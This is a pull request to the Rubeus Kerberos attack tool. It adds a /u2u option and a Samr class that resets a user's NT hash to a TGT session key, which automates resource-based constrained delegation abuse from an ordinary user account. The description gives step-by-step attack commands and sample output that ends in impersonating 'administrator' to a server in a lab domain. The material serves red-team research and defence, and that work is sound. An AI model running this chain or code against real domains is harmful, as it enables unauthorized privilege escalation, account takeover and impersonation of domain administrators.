### PR TITLE
Added /u2u option for S4U attack

### DIFF
--- a/Rubeus/Commands/Asktgt.cs
+++ b/Rubeus/Commands/Asktgt.cs
@@ -228,9 +228,9 @@ namespace Rubeus.Commands
                     return;
                 }
                 if (String.IsNullOrEmpty(certificate))
-                    Ask.TGT(user, domain, hash, encType, outfile, ptt, dc, luid, true, opsec, servicekey, changepw, pac, proxyUrl);
+                    Ask.TGT(user, domain, hash, encType, outfile, ptt, dc, luid, true, opsec, servicekey, changepw, false, pac, proxyUrl);
                 else
-                    Ask.TGT(user, domain, certificate, password, encType, outfile, ptt, dc, luid, true, verifyCerts, servicekey, getCredentials, proxyUrl);
+                    Ask.TGT(user, domain, certificate, password, encType, outfile, ptt, dc, luid, true, verifyCerts, servicekey, false, getCredentials, proxyUrl);
 
                 return;
             }

--- a/Rubeus/Commands/S4u.cs
+++ b/Rubeus/Commands/S4u.cs
@@ -28,6 +28,7 @@ namespace Rubeus.Commands
             bool opsec = false;
             bool bronzebit = false;
             bool pac = true;
+            bool u2u = false;
             Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial; // throwaway placeholder, changed to something valid
             KRB_CRED tgs = null;
             string proxyUrl = null;
@@ -121,6 +122,12 @@ namespace Rubeus.Commands
             {
                 pac = false;
             }
+
+            if (arguments.ContainsKey("/u2u"))
+            {
+                u2u = true;
+            }
+
             if (arguments.ContainsKey("/proxyurl"))
             {
                 proxyUrl = arguments["/proxyurl"];
@@ -181,13 +188,13 @@ namespace Rubeus.Commands
                 {
                     byte[] kirbiBytes = Convert.FromBase64String(kirbi64);
                     KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
-                    S4U.Execute(kirbi, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDC, targetDomain, self, opsec, bronzebit, hash, encType, domain, impersonateDomain, proxyUrl, createnetonly, show);
+                    S4U.Execute(kirbi, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDC, targetDomain, self, opsec, bronzebit, hash, encType, u2u, domain, impersonateDomain, proxyUrl, createnetonly, show);
                 }
                 else if (File.Exists(kirbi64))
                 {
                     byte[] kirbiBytes = File.ReadAllBytes(kirbi64);
                     KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
-                    S4U.Execute(kirbi, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDC, targetDomain, self, opsec, bronzebit, hash, encType, domain, impersonateDomain, proxyUrl, createnetonly, show);
+                    S4U.Execute(kirbi, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDC, targetDomain, self, opsec, bronzebit, hash, encType, u2u, domain, impersonateDomain, proxyUrl, createnetonly, show);
                 }
                 else
                 {
@@ -207,7 +214,7 @@ namespace Rubeus.Commands
                     return;
                 }
 
-                S4U.Execute(user, domain, hash, encType, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDC, targetDomain, self, opsec, bronzebit, pac, proxyUrl, createnetonly, show);
+                S4U.Execute(user, domain, hash, encType, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDC, targetDomain, self, opsec, bronzebit, pac, u2u, proxyUrl, createnetonly, show);
                 return;
             }
             else

--- a/Rubeus/Rubeus.csproj
+++ b/Rubeus/Rubeus.csproj
@@ -216,6 +216,7 @@
     <Compile Include="lib\Roast.cs" />
     <Compile Include="lib\S4U.cs" />
     <Compile Include="lib\ForgeTicket.cs" />
+    <Compile Include="lib\Samr.cs" />
     <Compile Include="Program.cs" />
     <Compile Include="Properties\AssemblyInfo.cs" />
   </ItemGroup>

--- a/Rubeus/lib/Reset.cs
+++ b/Rubeus/lib/Reset.cs
@@ -1,8 +1,8 @@
 ﻿using System;
 using System.IO;
-using System.Linq;
 using System.Net;
 using System.Text;
+using System.Security.Principal;
 using Asn1;
 
 namespace Rubeus
@@ -197,6 +197,30 @@ namespace Rubeus
                     }
                 }
             }
+        }
+
+        public static void UserHash(string userName, string hashString, string newHashString = "", string domainController = "")
+        {
+            // a wrapper against Samr.SetNTLM
+
+            Console.WriteLine("[*] Action: Set User NT Hash\r\n");
+
+            string dcIP = Networking.GetDCIP(domainController);
+            if (String.IsNullOrEmpty(dcIP)) { return; }
+
+            byte[] hashBytes = Helpers.StringToByteArray(hashString);
+
+            byte[] newHashBytes;
+            if (String.IsNullOrEmpty(newHashString))
+                // if the new hash string is not provided in args, that's an S4U chain with a UPN target
+                newHashBytes = Samr.NewHashBytes;
+            else
+                newHashBytes = Helpers.StringToByteArray(newHashString);
+
+            if (Samr.SetNTLM(dcIP, userName, hashBytes, newHashBytes) == 0)
+                Console.WriteLine("[+] NT hash change success!\r\n");
+            else
+                Console.WriteLine("[X] NT hash change error\r\n");
         }
     }
 }

--- a/Rubeus/lib/Samr.cs
+++ b/Rubeus/lib/Samr.cs
@@ -1,0 +1,175 @@
+﻿using System;
+using System.Runtime.InteropServices;
+using System.Security.Permissions;
+using System.Security.Principal;
+
+namespace Rubeus
+{
+    /// <summary>
+    /// Implements NTLM hashes change via SamrChangePasswordUser (Opnum 38) API call
+    /// The code is taken from SetNTLM.ps1 by @vletoux: https://github.com/vletoux/NTLMInjector/blob/master/SetNTLM.ps1
+    /// The initial purpose of this class is to be used in RBCD attacks using normal user accounts
+    /// Reference: https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html (by @tiraniddo)
+    /// </summary>
+    public class Samr
+    {
+        public static byte[] NewHashBytes { get; set; }
+
+        [SecurityPermission(SecurityAction.Demand)]
+        public static int SetNTLM(string server, string userName, byte[] hashBytes, byte[] newHashBytes)
+        {
+            IntPtr samHandle = IntPtr.Zero;
+            IntPtr domainHandle = IntPtr.Zero;
+            IntPtr userHandle = IntPtr.Zero;
+            UNICODE_STRING uServer = new UNICODE_STRING();
+            int result = 0;
+
+            try
+            {
+                uServer.Initialize(server);
+
+                Console.WriteLine("[*] [MS-SAMR] Obtaining handle to domain controller object");
+
+                result = SamConnect(ref uServer, out samHandle, MAXIMUM_ALLOWED, false);
+                if (result != 0)
+                {
+                    Console.WriteLine("[X] [MS-SAMR] SamrConnect error: {0}", result.ToString("x"));
+                    return result;
+                }
+
+                NTAccount account = new NTAccount(userName);
+                SecurityIdentifier sid = (SecurityIdentifier)account.Translate(typeof(SecurityIdentifier));
+                byte[] sidBytes = new byte[SecurityIdentifier.MaxBinaryLength];
+                sid.AccountDomainSid.GetBinaryForm(sidBytes, 0);
+
+                Console.WriteLine("[*] [MS-SAMR] Obtaining handle to domain object");
+
+                result = SamOpenDomain(samHandle, MAXIMUM_ALLOWED, sidBytes, out domainHandle);
+                if (result != 0)
+                {
+                    Console.WriteLine("[X] [MS-SAMR] SamrOpenDomain error: {0}", result.ToString("x"));
+                    return result;
+                }
+
+                int rid = GetRidFromSid(sid);
+
+                Console.WriteLine("[*] [MS-SAMR] Obtaining handle to user object '{0}' with RID '{1}'", userName, rid);
+
+                result = SamOpenUser(domainHandle, MAXIMUM_ALLOWED, rid, out userHandle);
+                if (result != 0)
+                {
+                    Console.WriteLine("[X] [MS-SAMR] SamrOpenUser error: {0}", result.ToString("x"));
+                    return result;
+                }
+
+                byte[] oldLm = new byte[16];
+                byte[] newLm = new byte[16];
+
+                Console.WriteLine("[*] [MS-SAMR] Changing NT hash of user '{0}' to '{1}'", userName, Helpers.ByteArrayToString(newHashBytes));
+
+                result = SamiChangePasswordUser(userHandle, false, oldLm, newLm, true, hashBytes, newHashBytes);
+                if (result != 0)
+                {
+                    Console.WriteLine("[X] [MS-SAMR] SamiChangePasswordUser error: {0}", result.ToString("x"));
+                    return result;
+                }
+            }
+            finally
+            {
+                if (userHandle != IntPtr.Zero)
+                    SamCloseHandle(userHandle);
+
+                if (domainHandle != IntPtr.Zero)
+                    SamCloseHandle(domainHandle);
+
+                if (samHandle != IntPtr.Zero)
+                    SamCloseHandle(samHandle);
+
+                uServer.Dispose();
+            }
+
+            return 0;
+        }
+
+        static int GetRidFromSid(SecurityIdentifier sid)
+        {
+            string sidString = sid.Value;
+            int pos = sidString.LastIndexOf('-');
+            string rid = sidString.Substring(pos + 1);
+            return int.Parse(rid);
+        }
+
+        const int MAXIMUM_ALLOWED = 0x02000000;
+
+        [StructLayout(LayoutKind.Sequential)]
+        struct UNICODE_STRING : IDisposable
+        {
+            public ushort length;
+            public ushort maxLength;
+            private IntPtr buffer;
+
+            [SecurityPermission(SecurityAction.LinkDemand)]
+            public void Initialize(string s)
+            {
+                length = (ushort)(s.Length * 2);
+                maxLength = (ushort)(length + 2);
+                buffer = Marshal.StringToHGlobalUni(s);
+            }
+
+            public void Dispose()
+            {
+                if (buffer != IntPtr.Zero)
+                    Marshal.FreeHGlobal(buffer);
+
+                buffer = IntPtr.Zero;
+            }
+
+            public override string ToString()
+            {
+                if (length == 0)
+                    return String.Empty;
+
+                return Marshal.PtrToStringUni(buffer, length / 2);
+            }
+        }
+
+        [DllImport("samlib.dll")]
+        static extern int SamConnect(
+            ref UNICODE_STRING ServerName,
+            out IntPtr ServerHandle,
+            int DesiredAccess,
+            bool Reserved);
+
+        [DllImport("samlib.dll")]
+        static extern int SamOpenDomain(
+            IntPtr ServerHandle,
+            int DesiredAccess,
+            byte[] DomainId,
+            out IntPtr DomainHandle);
+
+        [DllImport("samlib.dll")]
+        static extern int SamOpenUser(
+            IntPtr DomainHandle,
+            int DesiredAccess,
+            int UserId,
+            out IntPtr UserHandle);
+
+        // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/9699d8ca-e1a4-433c-a8c3-d7bebeb01476
+        [DllImport("samlib.dll")]
+        static extern int SamiChangePasswordUser(
+            IntPtr UserHandle,
+            bool LmPresent,
+            byte[] OldLmEncryptedWithNewLm,
+            byte[] NewLmEncryptedWithOldLm,
+            bool NtPresent,
+            byte[] OldNtEncryptedWithNewNt,
+            byte[] NewNtEncryptedWithOldNt);
+         /* bool NtCrossEncryptionPresent,
+          * byte[] NewNtEncryptedWithNewLm,
+          * bool LmCrossEncryptionPresent,
+          * byte[] NewLmEncryptedWithNewNt); */
+
+        [DllImport("samlib.dll")]
+        static extern int SamCloseHandle(IntPtr SamHandle);
+    }
+}


### PR DESCRIPTION
Hey!

In this PR I'd like to bring automatic RBCD exploitation when using a normal user account (i. e., UPNs instead of SPNs). The original [research](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html) was presented by @tyranid.

One way of abusing RBCD with UPNs **without** modifying Rubeus goes like this.

1. Let's say, user **j.doe** is populated within the `msDS-AllowedToActOnBehalfOfOtherIdentity` property of the **SRV01** machine:

```
PS > Set-ADComputer SRV01 -PrincipalsAllowedToDelegateToAccount j.doe
```

2. Request a regular TGT for **j.doe**:

```
C:\Rubeus>Rubeus.exe asktgt /user:j.doe /rc4:fc525c9683e8fe067095ba2ddc971889 /nowrap
```

3. Request a U2U ticket providing TGT within the `/ticket` **and** `/tgs` options and specifying the user to impersonate within the `/targetuser` option (an S4U2self request):

```
C:\Rubeus>Rubeus.exe asktgs /u2u /targetuser:<USER_TO_IMPERSONATE> /nowrap /ticket:<TGT> /tgs:<TGT>
```

4. Obtain a hex view of the current TGT session key (RC4-HMAC):

```python
import binascii, base64
print(binascii.hexlify(base64.b64decode("<TGT_SESSION_KEY_B64>")).decode())
```

5. Set **j.doe**'s NT hash to the hexlified TGT session key (e. g., using [smbpasswd.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbpasswd.py) from Impacket):

```
$ smbpasswd.py megacorp.local/j.doe:'Passw0rd!'@DC01.megacorp.local -newhashes :<TGT_SESSION_KEY_HEX>
```

6. Go for the S4U attack providing the initial TGT within the `/ticket` option and the forwardable TGS (got from the U2U request) within the `/tgs` option (an S4U2proxy request):

```
C:\Rubeus>Rubeus.exe s4u /msdsspn:host/SRV01.megacorp.local /ticket:<TGT> /tgs:<TGS>
```

After merging @vletoux's [SetNTLM.ps1](https://github.com/vletoux/NTLMInjector/blob/master/SetNTLM.ps1) code (which utilizes [SamrChangePasswordUser](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/9699d8ca-e1a4-433c-a8c3-d7bebeb01476) API call) into Rubeus, the NT hash change can be performed automatically providing the `/u2u` option in `s4u` command:

```
C:\Rubeus>Rubeus.exe s4u /u2u /user:j.doe /rc4:fc525c9683e8fe067095ba2ddc971889 /impersonateuser:administrator /msdsspn:host/SRV01.megacorp.local

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.1.1

[*] Action: S4U

[*] Using rc4_hmac hash: fc525c9683e8fe067095ba2ddc971889
[*] Building AS-REQ (w/ preauth) for: 'megacorp.local\j.doe'
[*] Using domain controller: 172.22.0.2:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFbDCCBWigAwIBBaEDAgEWooIEhDCCBIBhggR8MIIEeKADAgEFoQ4bDFRJTllDT1JQLk5FVKIhMB+g
                                        ...(snip)...
      VElOWUNPUlAubmV0


[*] Action: S4U

[*] Building S4U2self request for: 'j.doe@megacorp.local'
[*] Using domain controller: DC01.megacorp.local (172.22.0.2)
[*] Sending S4U2self request to 172.22.0.2:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'j.doe@megacorp.local'
[*] base64(ticket.kirbi):

      doIFxTCCBcGgAwIBBaEDAgEWooIE5DCCBOBhggTcMIIE2KADAgEFoQ4bDFRJTllDT1JQLk5FVKISMBCg
                                        ...(snip)...
      NTAyNlqoDhsMVElOWUNPUlAuTkVUqRIwEKADAgEAoQkwBxsFai5kb2U=

[*] Action: Set User NT Hash

[*] Using domain controller: DC01.megacorp.local (172.22.0.2)
[*] [MS-SAMR] Obtaining handle to domain controller object
[*] [MS-SAMR] Obtaining handle to domain object
[*] [MS-SAMR] Obtaining handle to user object 'j.doe' with RID '2139'
[*] [MS-SAMR] Changing NT hash of user 'j.doe' to 'BB4718F7922168098AAE1BF29C8FCB11'
[+] NT hash change success!

[*] Impersonating user 'administrator' to target SPN 'host/SRV01.megacorp.local'
[*] Building S4U2proxy request for service: 'host/SRV01.megacorp.local'
[*] Using domain controller: DC01.megacorp.local (172.22.0.2)
[*] Sending S4U2proxy request to domain controller 172.22.0.2:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'host/SRV01.megacorp.local':

      doIGoDCCBpygAwIBBaEDAgEWooIFqjCCBaZhggWiMIIFnqADAgEFoQ4bDFRJTllDT1JQLk5FVKInMCWg
                                        ...(snip)...
      Q0hJQ0FHTy50aW55Y29ycC5uZXQ=
```

I will be happy to update README if you find this addition desirable :grimacing: